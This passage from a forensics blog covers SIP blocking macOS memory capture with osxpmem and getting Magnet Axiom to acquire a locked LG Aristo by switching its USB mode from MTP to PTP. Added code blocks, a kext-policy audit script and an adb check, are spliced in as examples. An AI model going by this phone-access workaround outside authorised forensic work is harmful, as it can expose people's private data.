<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ1YYJz2NssHN7nb7AYtUgvnLZZ-ljXvBYMdZ154YZB7VvQY4fuib_20pfykB2HqHPx_qGnLlU_Gqe650o5NefDE_dxvRq81flVn2SxhF9CaNSySY_bxA4Zwb0_MeBRWpPwTXz7pK4Kjoc/s1600/blocked.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="353" data-original-width="849" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ1YYJz2NssHN7nb7AYtUgvnLZZ-ljXvBYMdZ154YZB7VvQY4fuib_20pfykB2HqHPx_qGnLlU_Gqe650o5NefDE_dxvRq81flVn2SxhF9CaNSySY_bxA4Zwb0_MeBRWpPwTXz7pK4Kjoc/s640/blocked.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>This is what the "System Extension Blocked" popup looks like. This is NOT the popup you see with osxpmem</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />... then, if you navigate to "Security & Privacy", click on the </span><span style="font-size: large;">"General" tab, </span><span style="font-size: large;">and click "Allow"</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0OZO-w7LHgdWSVnwV2PlJMVS6ag9xuhh_qrK4NHB6G5LAHfU0-oNRCewkj-qXzlpKKBehWjGAhPg8-XNgEp8OehkBd1I2AlUGTBJKGgH_jOxTov3zxgFL8hBS2clY7FrkrYtk2Z95k6KC/s1600/Screen+Shot+2018-07-13+at+10.57.39+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1146" data-original-width="1330" height="550" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0OZO-w7LHgdWSVnwV2PlJMVS6ag9xuhh_qrK4NHB6G5LAHfU0-oNRCewkj-qXzlpKKBehWjGAhPg8-XNgEp8OehkBd1I2AlUGTBJKGgH_jOxTov3zxgFL8hBS2clY7FrkrYtk2Z95k6KC/s640/Screen+Shot+2018-07-13+at+10.57.39+AM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Security & Privacy - "General". Note the "System software from developer REDACTED was blocked from loading" and the "Allow" button</i></span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: large;"><br />It would (ok, *should*) then stop the symbolic linking (that is what I assume is happening, although that is not confirmed yet) from the original folder to the StagedExtensions folder that allows the sandboxing/SIP to occur. That means that the kernel extension would then be able to run, and the world would be a glorious place. Except... it seems that once a developer/company signs their kext, which allows the bypassing of SIP, EVERYTHING signed by them in the future will also, automatically, be trusted. Obviously this could present a security issue down the road if those signing certificates were stolen. I don't know of that happening yet, but it does seem plausible and could presumably happen in the future.</span><br />
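<span style="font-size: large;">One way to keep an eye on exactly that concern, as an added example that is not part of the original post: macOS records user-approved kernel extensions in a small SQLite database, and the script below lists the approvals grouped by signing Team ID and flags any team you do not expect to be trusted. The database path (/var/db/SystemPolicyConfiguration/KextPolicy) and the kext_policy table layout are my assumptions from public documentation rather than anything stated in this post, so verify them against your own system; the Team IDs and bundle IDs in the sample data are made-up placeholders. It also maps a kext path to the copy SIP stages under /Library/StagedExtensions, which is where MacPmem.kext turned up above.</span>

```python
"""Audit user-approved kernel extension policy on macOS.

Added example, not code from the original post. Assumed (verify locally):
the approvals live in /var/db/SystemPolicyConfiguration/KextPolicy, in a
table kext_policy(team_id, bundle_id, allowed, developer_name, flags).
Sample data below is constructed; Team IDs and bundle IDs are placeholders.
"""
import sqlite3
from collections import defaultdict

KEXT_POLICY_DB = "/var/db/SystemPolicyConfiguration/KextPolicy"  # assumed path
STAGED_ROOT = "/Library/StagedExtensions"


def staged_copy_path(kext_path):
    """Where SIP staging would place a copy of an absolute kext path: the
    original path is appended unchanged to the staging root (matches the
    /Library/StagedExtensions/Users/... path seen in the kextutil output)."""
    if not kext_path.startswith("/"):
        raise ValueError("kext path must be absolute")
    return STAGED_ROOT + kext_path


def approved_teams(conn):
    """Return {team_id: [bundle_id, ...]} for every row flagged as allowed.
    A team appearing here is trusted for its future kexts as well."""
    approved = defaultdict(list)
    for team_id, bundle_id in conn.execute(
            "SELECT team_id, bundle_id FROM kext_policy WHERE allowed = 1"):
        approved[team_id].append(bundle_id)
    return dict(approved)


def review_policy(conn, expected_teams):
    """Return the sorted list of approved Team IDs that are not on the
    analyst's expected list (empty when every approval is accounted for)."""
    return sorted(t for t in approved_teams(conn) if t not in expected_teams)


def open_policy_db(path=KEXT_POLICY_DB):
    """Open the live policy database read-only (needs root on a real Mac)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def build_sample_policy_db():
    """Constructed KextPolicy-style database for demonstration only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE kext_policy (
        team_id TEXT, bundle_id TEXT, allowed INTEGER,
        developer_name TEXT, flags INTEGER)""")
    conn.executemany("INSERT INTO kext_policy VALUES (?,?,?,?,?)", [
        ("TEAMID0001", "com.example.memoryacq.MacPmem", 1, "Example Forensics", 1),
        ("TEAMID0001", "com.example.memoryacq.other", 1, "Example Forensics", 1),
        ("TEAMID0002", "com.example.vpn.driver", 0, "Example VPN", 1),
        ("TEAMID0003", "com.example.unknown.kext", 1, "Unknown Dev", 1),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_policy_db()
    for team, bundles in approved_teams(db).items():
        print(team, "->", ", ".join(bundles))
    print("unexpected teams:", review_policy(db, {"TEAMID0001"}))
    print(staged_copy_path("/Users/brimorlabs/Desktop/Cedarpelta-DEV/"
                           "OSX_Live_Response/Tools/osxpmem_2.1/osxpmem.app/MacPmem.kext"))
```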
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I've tried a couple of workarounds to bypass the SIP process to allow me to dump memory from a system without having to go through all of the bypass sip/csrutil steps (if you are unfamiliar with that, please <a href="http://lmgtfy.com/?q=bypass+sip+csrutil">follow the link here</a>). None of my attempts succeeded yet, but I am still trying. I specifically do NOT want to reboot the computer, because I want to collect memory from the system and not potentially lose volatile data. I will either update this post, or continue this as a series, when I find a sufficient work around (if there is one) to this issue! With that being said, if you found a way to dump memory from a MacOS live system that has SIP enabled, and if you are able to share it publicly (or privately) please share your methodology. I would love for the next LRC update to be able to include memory dumps from systems with SIP enabled!</span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-27070213693697328742018-06-17T11:32:00.000-04:002018-06-17T11:32:45.123-04:00Who's Down With PTP?<br />
<span style="font-size: large;">Hello again readers and welcome back! Today's blog post covers a series of (unfortunate) events that I had to work through in order to acquire data from an LG Aristo phone. These methods might also work for other devices, especially severely locked-down ones such as the phones sold primarily for pre-paid plans like TracFone. (DISCLAIMER: I am *NOT* claiming that this will work all the time. It seems that tech companies/developers sometimes take shortcuts (*gasp*), which means that devices don't quite function the way they are "supposed" to function.)<br /><br /><br />Our journey begins with using Magnet Axiom (thanks <a href="https://twitter.com/B1N2H3X">Jessica</a>!) in an attempt to acquire data, and subsequently process that data, from a stock Android device. Following the very concise, user-friendly prompts, all of the steps were properly taken in an effort to acquire the device. However, the first issue arose when the "Trust this computer" prompt never came up on the Aristo itself. Since I've had many experiences with mobile devices in the past, my first thought was to fire up Android Debug Bridge (adb) to make sure that adb was properly recognizing the device, because if adb can't recognize it, acquisition through just about any commercial tool just won't work. Interestingly, choosing the "Charging only" option from the USB options in Developer mode, which is usually the standard in Android device acquisition, results in nothing being recognized in adb.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio-Y6VIGzDDi5BBSZfwePhvxgirl25IKTi6K_Hwcmi0saJgJwcFE_jwoNEXPnHgGvVdJhnhKzOezYue62fUQuaJw1XPuJrrXHrj1JzEzsHXoZgs8kfJ7AmSHvfpogGCaRRvCGLDRqI_VM6/s1600/ChargingOnly.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1233" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio-Y6VIGzDDi5BBSZfwePhvxgirl25IKTi6K_Hwcmi0saJgJwcFE_jwoNEXPnHgGvVdJhnhKzOezYue62fUQuaJw1XPuJrrXHrj1JzEzsHXoZgs8kfJ7AmSHvfpogGCaRRvCGLDRqI_VM6/s640/ChargingOnly.jpg" width="492" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Charging, the usual method, does not work </i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyFYedSBuG7kBiqhthmAMgQXSyODuRhkgz48bIs_CgOcF0x_ZEOTn9OhhZ_lmnUTRpl3BFYjlo5_dvZsV_hQ33NzDtGExu9gdap0bG7WUdSqI29TCpF6Da_nVMNEAfHcq5U1BQo2068wBe/s1600/adb-no-devices-charging.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="494" data-original-width="1393" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyFYedSBuG7kBiqhthmAMgQXSyODuRhkgz48bIs_CgOcF0x_ZEOTn9OhhZ_lmnUTRpl3BFYjlo5_dvZsV_hQ33NzDtGExu9gdap0bG7WUdSqI29TCpF6Da_nVMNEAfHcq5U1BQo2068wBe/s640/adb-no-devices-charging.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>No devices shown in adb</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />So, the next step is to see whether connecting with MTP (Media Transfer Protocol) instead will allow adb to recognize the device. It is a different protocol, and I know from past experience that sometimes a different protocol means the difference between working and not working. When I chose MTP from the Developer Options, I was *finally* presented with the desired "Allow USB debugging" prompt, which also lists the unique fingerprint of the connecting computer. So...success!!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizEYT2dOtGw4WSwBSy7WttWS73JSUmd8i-Ex99IV5sj4Y6Xm4HTMKBPt_rpC8tzoyJuL7xk3YtUZ8q2hnRjCuYncLL5IIpFwn5VDGNAYYUd40e6NKJFhjeO89JUONfihTv2-9o8NJWJJWU/s1600/MTPPicked.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1172" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizEYT2dOtGw4WSwBSy7WttWS73JSUmd8i-Ex99IV5sj4Y6Xm4HTMKBPt_rpC8tzoyJuL7xk3YtUZ8q2hnRjCuYncLL5IIpFwn5VDGNAYYUd40e6NKJFhjeO89JUONfihTv2-9o8NJWJJWU/s640/MTPPicked.jpg" width="468" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>MTP is picked as the USB connection on the device</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2hQBNtgijIuQxK6S2d9bDE01xCgO4-feCoP1eWDZ9ttwN944OZr6ASaDe84FbGGUDXb7znAs-epFvW49usmLrRKESWkTZTKhxaUw1aXPSlfmXj4Kh4eC3Jb1q_EHI2xoVPWMy33E97Z6M/s1600/USB-Debugging.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1169" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2hQBNtgijIuQxK6S2d9bDE01xCgO4-feCoP1eWDZ9ttwN944OZr6ASaDe84FbGGUDXb7znAs-epFvW49usmLrRKESWkTZTKhxaUw1aXPSlfmXj4Kh4eC3Jb1q_EHI2xoVPWMy33E97Z6M/s640/USB-Debugging.jpg" width="465" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Finally, debugging options show up on the device with MTP!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />Or not. adb recognizes the device and allows me to send commands, such as making a backup, but what I need is for the Magnet agent to be pushed to the device so we can get the user data, such as SMS, contacts, call history, etc. When connected via MTP, it seems the Aristo allows some data to be transferred from the device to a system, but it does not allow data to go from the system to the mobile device. Curses!! Foiled again!!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE6KocwngMo5KxQ8d8ZYSIO8DQqXDFepHv47m0-_R3VN7UByEFHCUApqOEkzR4Jkbp0G-Uufe6hVDpLV0jOYeynBvPrP3JisAjaUVwSFMlpjrw2SrlJNBF91vRLHquEkWtgea1M8nVn2Uk/s1600/adb-mtp-then-ptp.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="672" data-original-width="1600" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE6KocwngMo5KxQ8d8ZYSIO8DQqXDFepHv47m0-_R3VN7UByEFHCUApqOEkzR4Jkbp0G-Uufe6hVDpLV0jOYeynBvPrP3JisAjaUVwSFMlpjrw2SrlJNBF91vRLHquEkWtgea1M8nVn2Uk/s640/adb-mtp-then-ptp.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>adb recognizes the device with MTP. Partial success!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />After deliberating, some adb-kung-fu, and using Google to search for additional options, I decided to try using PTP (Picture Transfer Protocol). adb still recognized the device; however, for reasons that COMPLETELY elude me, setting it up this way allowed not only the backup to be performed, but ALSO allowed data (aka the Magnet agent) to be pushed to the device! At last, I finally had success!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjXqvLbGbuJKGMbxJlHTVaMF_5RZwPto-BykBUTCeDB3IQifsEEsIIRApVh28ePhwozstdStZd0_IttrurASgLPJGx5gFSkshonxMtnexF_Cmuej5xCyDTkIM3bKaBwn_iKudYRweYTduw/s1600/PTP-picked.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1246" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjXqvLbGbuJKGMbxJlHTVaMF_5RZwPto-BykBUTCeDB3IQifsEEsIIRApVh28ePhwozstdStZd0_IttrurASgLPJGx5gFSkshonxMtnexF_Cmuej5xCyDTkIM3bKaBwn_iKudYRweYTduw/s640/PTP-picked.jpg" width="498" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Now we choose the PTP option. For some reason, this choice works!!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsUd8eGB3O2tZ1KrnsKH2noNRnd8LjfaDIKhi1oYl53INJVEyr8N6fptaN73tc5qPcPMOMrvx3_aBKR8JdgwmUqKileDaCjQ3iHAiWm6H73OouQpVTgumKaXkrhjXGuLbS6FMwR5-ZfsO/s1600/axiom-ptp-unlocked-acq.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="974" data-original-width="1600" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsUd8eGB3O2tZ1KrnsKH2noNRnd8LjfaDIKhi1oYl53INJVEyr8N6fptaN73tc5qPcPMOMrvx3_aBKR8JdgwmUqKileDaCjQ3iHAiWm6H73OouQpVTgumKaXkrhjXGuLbS6FMwR5-ZfsO/s640/axiom-ptp-unlocked-acq.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>In Axiom, we choose the ADB (Unlocked) method</i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8FuHE9DrXgD_q11nVop_rltRIQ5iN25IyKvOLW281b-XzNuENFHlBDd3PsZsnafFtz3T2a35IBy1qWFVUdAOPFJ0DN4dFfceIkrYKEGq9DXLVhaNjh3AnfuobVZimnF2QIL1ccqPyyoCf/s1600/showsupinaxiom.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="981" data-original-width="1600" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8FuHE9DrXgD_q11nVop_rltRIQ5iN25IyKvOLW281b-XzNuENFHlBDd3PsZsnafFtz3T2a35IBy1qWFVUdAOPFJ0DN4dFfceIkrYKEGq9DXLVhaNjh3AnfuobVZimnF2QIL1ccqPyyoCf/s640/showsupinaxiom.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Finally! With the PTP connection, AXIOM recognizes the device!</i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSJ528VNJg0mZ1s9vjhaIHqJvNma6K1kcifZeCL9dPaVe9ewwP-PtsqS2WKYjkvBmwqa8EM_HGTdm4WOC86QY9JUueD7VU47hwCuvCggtkyDB0dYN0ZyGA2VlkKE2qxdlvggkGi05hymkj/s1600/readyToImage.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="677" data-original-width="1600" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSJ528VNJg0mZ1s9vjhaIHqJvNma6K1kcifZeCL9dPaVe9ewwP-PtsqS2WKYjkvBmwqa8EM_HGTdm4WOC86QY9JUueD7VU47hwCuvCggtkyDB0dYN0ZyGA2VlkKE2qxdlvggkGi05hymkj/s640/readyToImage.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Ready to start processing!</i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSUMprUSHbmbasUTo0_cyALhZO7i8Cgq-Frmcb4doSHRCrHmrclRvntb6JE_h0JIZ5l-sDiW25LpvqpDBtFF5jNrJCQkKE_GwhCZYJSKQJ42Mjm6tIKsEUx4qwcxtlpC0L1AWVOD-vQQxW/s1600/RunningAtLast.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="755" data-original-width="1600" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSUMprUSHbmbasUTo0_cyALhZO7i8Cgq-Frmcb4doSHRCrHmrclRvntb6JE_h0JIZ5l-sDiW25LpvqpDBtFF5jNrJCQkKE_GwhCZYJSKQJ42Mjm6tIKsEUx4qwcxtlpC0L1AWVOD-vQQxW/s640/RunningAtLast.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Data acquisition has begun at last!</i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmhdnDttkjW2uFIc8_GSMRUbmCi3C97A1NP78GKqlDo0LoPaDIA4m2v2u5GV8vHfb6p4_1L9ItLv-xbm3C4-jjOjq5AaRDZ414QW9Awac8QMVd5JU_wKgNocIum5MquyExxaeT-ID5Ia8m/s1600/ReadyToRockAtLast.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="588" data-original-width="1600" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmhdnDttkjW2uFIc8_GSMRUbmCi3C97A1NP78GKqlDo0LoPaDIA4m2v2u5GV8vHfb6p4_1L9ItLv-xbm3C4-jjOjq5AaRDZ414QW9Awac8QMVd5JU_wKgNocIum5MquyExxaeT-ID5Ia8m/s640/ReadyToRockAtLast.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Our data has been acquired!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Interestingly enough, however, when I completely cleared the Trusted Devices on the mobile device, I could not get the "Trust Connections from this device" prompt to show up using a PTP connection. So, as long as you follow the method below, you *may* be able to get data from a severely locked down mobile device!<br /><br />0) Get familiar with using adb from the command line. </span><br />
<span style="font-size: large;"><i>It is a free download, and most commercial tools use adb behind the scenes. If you do any work with Android devices, you should know some basics of adb!</i></span><br />
<span style="font-size: large;"><i><br /></i>1) Connect the device using the MTP protocol. </span><br />
<span style="font-size: large;">2) When presented with the Trust Connections prompt on the device, choose OK and make sure the "Always allow from this computer" box is checked</span><br />
<span style="font-size: large;">3) Change the connection protocol to PTP</span><br />
<span style="font-size: large;">4) Acquire the device using Magnet Axiom</span><br />
<span style="font-size: large;">5) ....</span><br />
<span style="font-size: large;">6) PROFIT!!<br /><br /><br />One additional note about the Magnet agent when using Magnet Axiom to acquire data from a device: in my opinion, it is very important to choose the "Remove agent from device upon completion" option, found under Settings, when acquiring data from a mobile device. We ran into this issue of the agent being left behind when processing mobile devices during forward deployments. When we had devices associated with high value entities, the final step in data acquisition was that we would have to interact with the device and manually remove the agent and acquisition log(s). (NOTE: it was not Magnet, as they did not exist at the time; it was another vendor who I will not publicly name.) It is entirely up to the end user whether they feel comfortable leaving behind an agent or not. I definitely do not and will always choose to remove it. I just wanted to specifically point that out to anyone using Axiom to get data from mobile devices!</span><br />
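A pre-flight check for the adb connection walked through in the steps above, as an added example (a shell script written for this post, not the post's own code and not Magnet's). It classifies what <code>adb devices -l</code> reports, maps each state to the USB-mode step it corresponds to, and, once the device is authorized, proves the host-to-device direction works with a throwaway file before any agent is deployed; the <code>/data/local/tmp</code> path and the sample adb output are assumptions, and the marker file is removed from the handset afterwards.

```shell
#!/bin/sh
# adb pre-flight check for Android acquisition. Added example; not code from the post or from Magnet.
# 1. Classify what `adb devices -l` reports (none / unauthorized / offline / device).
# 2. Tie each state to the USB-mode step in the post (Charging only -> MTP -> accept prompt -> PTP).
# 3. Once authorized, prove the host-to-device direction works before deploying any agent,
#    since that is the direction MTP silently blocked on the LG Aristo.

# Constructed sample of `adb devices -l` output (not captured from a real device), used offline.
SAMPLE_UNAUTHORIZED='List of devices attached
0123456789ABCDEF       unauthorized usb:1-1 transport_id:1'

# adb_state "<output of adb devices -l>" -> prints one of: none, unauthorized, offline, device, unknown.
adb_state() {
    # Drop the "List of devices attached" header and blank lines; keep the first device row.
    row=$(printf '%s\n' "$1" | sed '1d' | grep -v '^[[:space:]]*$' | head -n 1)
    if [ -z "$row" ]; then
        echo none
        return 0
    fi
    # Second whitespace-separated field is the state adb reports for that device.
    set -- $row
    case "${2:-}" in
        device|unauthorized|offline) echo "$2" ;;
        *) echo unknown ;;
    esac
    return 0
}

# advice_for_state <state> -> prints the next step from the post for that state.
advice_for_state() {
    case "$1" in
        none)         echo "No device seen: 'Charging only' hides the device from adb; switch the USB option to MTP." ;;
        unauthorized) echo "Device present but the 'Allow USB debugging' prompt is pending; accept it with 'Always allow from this computer' checked." ;;
        offline)      echo "Device offline: reconnect the cable and wait for adb to re-enumerate it." ;;
        device)       echo "Device authorized; verify the host-to-device direction before starting the commercial tool." ;;
        *)            echo "Unrecognized adb state: $1" ;;
    esac
}

# Push a small marker file, read it back, then delete it so nothing is left on the handset.
# Returns 0 if both directions work, 1 otherwise. Needs a live, authorized device.
push_self_test() {
    marker="adb_preflight_$$.txt"
    remote="/data/local/tmp/$marker"   # assumed writable without root on stock Android
    printf 'preflight %s\n' "$(date +%s)" > "$marker"
    if adb push "$marker" "$remote" >/dev/null 2>&1 &&
       adb shell "cat $remote" 2>/dev/null | grep -q preflight; then
        adb shell "rm -f $remote" >/dev/null 2>&1
        rm -f "$marker"
        return 0
    fi
    rm -f "$marker"
    return 1
}

main() {
    out=$(adb devices -l 2>/dev/null || true)
    state=$(adb_state "$out")
    echo "adb state: $state"
    advice_for_state "$state"
    if [ "$state" = "device" ]; then
        if push_self_test; then
            echo "push and pull OK: an acquisition agent can be deployed over this USB mode"
        else
            echo "push failed: device-to-host only (the MTP behaviour seen in the post); switch to PTP and re-run"
        fi
    fi
}

# Only talk to a real device when explicitly asked, so the functions can be sourced and tested offline.
if [ "${1:-}" = "run" ]; then
    main
fi
```

Run it as <code>sh adb_preflight.sh run</code> with the handset attached; without the argument it only defines the functions.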
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBZslk2wR-ZCQ6NovdzDVBcERdDkMx6lB7-nWHZ4Vv3DsZ2hK2AiH_Nkhz3LqOCVEt-Qv859WNIMiLB5daFcw-RUgMjhyCGmiqm5iKhLG8rocr9ZFIZAH8Af091ujuvGsmXDTz-ec5RRYE/s1600/axiom-agent-settings.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="474" data-original-width="1600" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBZslk2wR-ZCQ6NovdzDVBcERdDkMx6lB7-nWHZ4Vv3DsZ2hK2AiH_Nkhz3LqOCVEt-Qv859WNIMiLB5daFcw-RUgMjhyCGmiqm5iKhLG8rocr9ZFIZAH8Af091ujuvGsmXDTz-ec5RRYE/s640/axiom-agent-settings.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>To change the agent settings, open Process, navigate to Tools, then Settings</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKKj89UlbhMhGoHQM245JqiNZhnB9eZhx50VsFdMq4uGvUeRAC2HDKsiKSFC5Y4SZh-cY1ECvWXADv7j1D348H0TnkhEe5mz32F3YtsYzuU7YrYyFXx07Ex7jv7puN1zE3gNWkp8soxQIO/s1600/Agent_Settings_Not-Checked.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="920" data-original-width="1287" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKKj89UlbhMhGoHQM245JqiNZhnB9eZhx50VsFdMq4uGvUeRAC2HDKsiKSFC5Y4SZh-cY1ECvWXADv7j1D348H0TnkhEe5mz32F3YtsYzuU7YrYyFXx07Ex7jv7puN1zE3gNWkp8soxQIO/s640/Agent_Settings_Not-Checked.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Check the "Restore Device State" box to remove the Magnet agent after acquisition</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>Posted by Brian Moran on 2018-04-06: Fishing for work is almost as bad as phishing (for anything)<div style="color: #222222; font-family: arial, sans-serif;">
<br /></div>
<div>
<div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
